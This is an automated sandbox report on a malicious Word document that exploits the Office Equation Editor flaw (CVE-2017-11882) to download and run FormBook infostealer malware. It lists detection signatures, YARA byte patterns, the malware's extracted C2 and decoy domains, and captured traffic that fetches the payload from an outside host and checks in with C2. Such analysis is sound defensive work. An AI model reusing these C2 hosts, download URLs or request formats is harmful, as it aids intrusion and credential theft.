Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report AWB00028487364 -000487449287.doc

Overview

General Information

Sample Name:AWB00028487364 -000487449287.doc
Analysis ID:432651
MD5:1ec3b91ed189962f5dbab025347f11a9
SHA1:4abe9e2631f5c2ef5e3c979e5845b460e8448658
SHA256:472ee2b8c300718535b7c997c3a7884c125bb697feb4969a3002355d04e4050c
Tags:doc
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1924 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 1296 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • prosper3512.exe (PID: 2580 cmdline: C:\Users\user\AppData\Roaming\prosper3512.exe MD5: CB4947E5C78ADA624D22C28EE9079871)
      • prosper3512.exe (PID: 2308 cmdline: C:\Users\user\AppData\Roaming\prosper3512.exe MD5: CB4947E5C78ADA624D22C28EE9079871)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • control.exe (PID: 2876 cmdline: C:\Windows\SysWOW64\control.exe MD5: 9130377F87A2153FEAB900A00EA1EBFF)
          • cmd.exe (PID: 2964 cmdline: /c del 'C:\Users\user\AppData\Roaming\prosper3512.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.updatesz.com/hlx/"], "decoy": ["firo.store", "unmeasured-grace.com", "burger-ff.com", "alcargomoversllc.com", "brianratkevich.com", "semugaralara01.net", "ngalvision.com", "texaslearningpods.com", "ontarioboatcharters.com", "kleinrugcleaning.com", "michaelvancebromfield.com", "habitameya.com", "elyoma.com", "worldtvepisode.com", "masatakahorie.com", "jumpinginfo.com", "hfjxhs.com", "bf-swiss.com", "rvingbus.com", "suxfi.com", "schoolcardtrades.com", "motion-airsoft.com", "123netflix.moe", "ic200mdl750.com", "silkensarees.com", "digitalmarketingtraining.xyz", "foypay.com", "eudoraacantik.com", "healthyandwealthie.com", "print-postcards-fast.com", "alpha-psych.com", "merthyrrock.com", "mss52.com", "cddcsw.com", "istanbulbisiklettamircisi.com", "ertugrulbey.net", "katarina-yoga.com", "findholmesinlaurelmaryland.com", "sabciu.net", "shipthuocnhanh24h.com", "veganonthegreens.com", "ailil-alvarez.com", "thefashionszone.com", "geminicomputerofficial.com", "terraveda.net", "ruhstorfer-gruppe.info", "suderstr.com", "yunjichem.com", "priyadubai.com", "sofierceboutique.com", "nealcurtiss.com", "mcgdinner.com", "steplife.info", "pwagih.com", "cpzgzcw.com", "wierzewzwierze.com", "asbestosconsultancyservices.com", "centerstageacademyaz.com", "skip1-dndasasd.com", "successteamrealty.com", "mijninboxe.com", "berkeleyrehab.com", "tfjxw.com", "mcluxuryrentals.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.1.prosper3512.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.1.prosper3512.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.1.prosper3512.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x175f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1770c:$sqlite3step: 68 34 1C 7B E1
        • 0x17628:$sqlite3text: 68 38 2A 90 C5
        • 0x1774d:$sqlite3text: 68 38 2A 90 C5
        • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
        4.2.prosper3512.exe.5c0000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.prosper3512.exe.5c0000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 185.239.243.112, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1296, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1296, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\prosper3512.exe, CommandLine: C:\Users\user\AppData\Roaming\prosper3512.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\prosper3512.exe, NewProcessName: C:\Users\user\AppData\Roaming\prosper3512.exe, OriginalFileName: C:\Users\user\AppData\Roaming\prosper3512.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1296, ProcessCommandLine: C:\Users\user\AppData\Roaming\prosper3512.exe, ProcessId: 2580

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.updatesz.com/hlx/"], "decoy": ["firo.store", "unmeasured-grace.com", "burger-ff.com", "alcargomoversllc.com", "brianratkevich.com", "semugaralara01.net", "ngalvision.com", "texaslearningpods.com", "ontarioboatcharters.com", "kleinrugcleaning.com", "michaelvancebromfield.com", "habitameya.com", "elyoma.com", "worldtvepisode.com", "masatakahorie.com", "jumpinginfo.com", "hfjxhs.com", "bf-swiss.com", "rvingbus.com", "suxfi.com", "schoolcardtrades.com", "motion-airsoft.com", "123netflix.moe", "ic200mdl750.com", "silkensarees.com", "digitalmarketingtraining.xyz", "foypay.com", "eudoraacantik.com", "healthyandwealthie.com", "print-postcards-fast.com", "alpha-psych.com", "merthyrrock.com", "mss52.com", "cddcsw.com", "istanbulbisiklettamircisi.com", "ertugrulbey.net", "katarina-yoga.com", "findholmesinlaurelmaryland.com", "sabciu.net", "shipthuocnhanh24h.com", "veganonthegreens.com", "ailil-alvarez.com", "thefashionszone.com", "geminicomputerofficial.com", "terraveda.net", "ruhstorfer-gruppe.info", "suderstr.com", "yunjichem.com", "priyadubai.com", "sofierceboutique.com", "nealcurtiss.com", "mcgdinner.com", "steplife.info", "pwagih.com", "cpzgzcw.com", "wierzewzwierze.com", "asbestosconsultancyservices.com", "centerstageacademyaz.com", "skip1-dndasasd.com", "successteamrealty.com", "mijninboxe.com", "berkeleyrehab.com", "tfjxw.com", "mcluxuryrentals.com"]}
          Multi AV Scanner detection for domain / URLShow sources
          Source: carbinz.gaVirustotal: Detection: 6%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exeReversingLabs: Detection: 29%
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeReversingLabs: Detection: 29%
          Multi AV Scanner detection for submitted fileShow sources
          Source: AWB00028487364 -000487449287.docVirustotal: Detection: 30%Perma Link
          Source: AWB00028487364 -000487449287.docReversingLabs: Detection: 36%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343505318.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2084947742.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343583438.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2160305551.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2159230882.0000000000290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2086370454.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.1.prosper3512.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.prosper3512.exe.5c0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.prosper3512.exe.5c0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.prosper3512.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exeJoe Sandbox ML: detected
          Source: 7.2.control.exe.540000.0.unpackAvira: Label: TR/Dropper.Gen
          Source: 5.1.prosper3512.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.control.exe.6523a8.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 7.2.control.exe.262f834.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 4.2.prosper3512.exe.5c0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.prosper3512.exe.25d0000.4.unpackAvira: Label: TR/Dropper.Gen
          Source: 7.0.control.exe.540000.0.unpackAvira: Label: TR/Dropper.Gen
          Source: 5.2.prosper3512.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.prosper3512.exe.5772f0.1.unpackAvira: Label: TR/Dropper.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\prosper3512.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\prosper3512.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: control.pdb source: prosper3512.exe, 00000005.00000002.2161047625.00000000025D0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: prosper3512.exe, control.exe
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_0040263E FindFirstFileA,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi
          Source: global trafficDNS query: name: carbinz.ga
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 142.250.180.211:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 142.250.180.211:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 142.250.180.211:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.updatesz.com/hlx/
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 10 Jun 2021 14:22:07 GMTContent-Type: application/x-msdownloadContent-Length: 245650Last-Modified: Wed, 09 Jun 2021 23:32:39 GMTConnection: keep-aliveETag: "60c14f97-3bf92"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 b8 84 3a 75 d9 ea 69 75 d9 ea 69 75 d9 ea 69 b6 d6 b5 69 77 d9 ea 69 75 d9 eb 69 ee d9 ea 69 b6 d6 b7 69 64 d9 ea 69 21 fa da 69 7f d9 ea 69 b2 df ec 69 74 d9 ea 69 52 69 63 68 75 d9 ea 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c6 e3 1a 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d4 01 00 00 04 00 00 3c 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 c0 02 00 00 0a 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: GET /hlx/?5jSp=B58lx/xfXHfuM7XpBg0CPLD4IpEHx1MuvfPUCu/nTzR4B4jEH/TGM7WOLp8Aty+Q3gKYZw==&JR-laV=zN90U HTTP/1.1Host: www.centerstageacademyaz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 185.239.243.112 185.239.243.112
          Source: Joe Sandbox ViewASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: global trafficHTTP traffic detected: GET /modex/prosperx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: carbinz.gaConnection: Keep-Alive
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{55594574-8E09-401E-A760-1A1C7B299BE3}.tmpJump to behavior
          Source: global trafficHTTP traffic detected: GET /modex/prosperx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: carbinz.gaConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /hlx/?5jSp=B58lx/xfXHfuM7XpBg0CPLD4IpEHx1MuvfPUCu/nTzR4B4jEH/TGM7WOLp8Aty+Q3gKYZw==&JR-laV=zN90U HTTP/1.1Host: www.centerstageacademyaz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2095586228.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: carbinz.ga
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
